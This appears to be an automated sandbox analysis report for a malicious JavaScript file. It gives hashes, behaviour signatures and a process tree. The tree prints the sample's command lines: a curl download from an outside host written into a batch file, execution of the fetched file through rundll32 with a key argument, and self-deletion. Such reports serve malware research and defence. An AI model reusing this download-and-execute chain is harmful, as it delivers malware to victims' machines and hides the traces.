Analysis
- max time kernel: 119s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20230831-en
- resource tags: arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
- submitted: 01/09/2023, 16:49
Static task: static1
Behavioral task: behavioral1
- Sample: fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
- Resource: win7-20230831-en
Behavioral task: behavioral2
- Sample: fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
- Resource: win10v2004-20230831-en
General
- Target: fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
- Size: 34KB
- MD5: d38a35de750d0d8628cb073a9a0ad8b2
- SHA1: b98af1c8fe2a75060fa25a7eee20c32518271822
- SHA256: fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947
- SHA512: b7348f060b646efd8e7501ce7a411346b7de95a715b7a1d2294df32c2b4ed425262ef0102af2d72c5f3d0f5f8db2f0feede4f5885a2fa6d48f9c2c9b40cde247
- SSDEEP: 768:RwRahuDvIhINs1sCT7A797k7a7a7Q7u7F7r7e7I7B7C7D7N7y7o727B7of7y7M76:RwRahBhIN3CTMJ4W+cC5fS0VWnJWk6l5
Malware Config
Signatures
- Deletes itself (1 IoCs)
  pid 2696, Process cmd.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (18 IoCs)
  description                        | pid  | Process     | procid_target
  PID 2440 wrote to memory of 2696   | 2440 | wscript.exe | 28
  PID 2440 wrote to memory of 2696   | 2440 | wscript.exe | 28
  PID 2440 wrote to memory of 2696   | 2440 | wscript.exe | 28
  PID 2440 wrote to memory of 2112   | 2440 | wscript.exe | 30
  PID 2440 wrote to memory of 2112   | 2440 | wscript.exe | 30
  PID 2440 wrote to memory of 2112   | 2440 | wscript.exe | 30
  PID 2440 wrote to memory of 2720   | 2440 | wscript.exe | 32
  PID 2440 wrote to memory of 2720   | 2440 | wscript.exe | 32
  PID 2440 wrote to memory of 2720   | 2440 | wscript.exe | 32
  PID 2440 wrote to memory of 2660   | 2440 | wscript.exe | 34
  PID 2440 wrote to memory of 2660   | 2440 | wscript.exe | 34
  PID 2440 wrote to memory of 2660   | 2440 | wscript.exe | 34
  PID 2440 wrote to memory of 2628   | 2440 | wscript.exe | 36
  PID 2440 wrote to memory of 2628   | 2440 | wscript.exe | 36
  PID 2440 wrote to memory of 2628   | 2440 | wscript.exe | 36
  PID 2440 wrote to memory of 2948   | 2440 | wscript.exe | 37
  PID 2440 wrote to memory of 2948   | 2440 | wscript.exe | 37
  PID 2440 wrote to memory of 2948   | 2440 | wscript.exe | 37
Processes
- C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
  Signatures: Suspicious use of WriteProcessMemory
  PID: 2440
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js"
    Signatures: Deletes itself
    PID: 2696
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\Admin\AppData\Local\Temp\dignissimos.neaque.x" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\dignissimos.n.bat"
    PID: 2112
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\dignissimos.n.bat"
    PID: 2720
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\dignissimos.neaque.x" "dignissimos.n"
    PID: 2660
  - C:\Windows\System32\rundll32.exe
    Command line: "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\dignissimos.n", scab /k arabika752
    PID: 2628
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\dignissimos.n.bat"
    PID: 2948
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 149B
  MD5: c35fe7fbb1aec6c72da5d0fdeb26c222
  SHA1: f0ef85f0d7fed0b54dc9f7fadf777089b1f404f8
  SHA256: 737835adf64ffb2bfd6dc3d7ab2d23d2c82f292ec736997f5fa5f89eb8c13983
  SHA512: 727213eeebfeb2222113a683e681642bbb7d3df42e32ae0e4457689b7bb8c6630122b1b6c1d220073b1ac44c749cf03d3074ec034237cec2f0680126eef875ff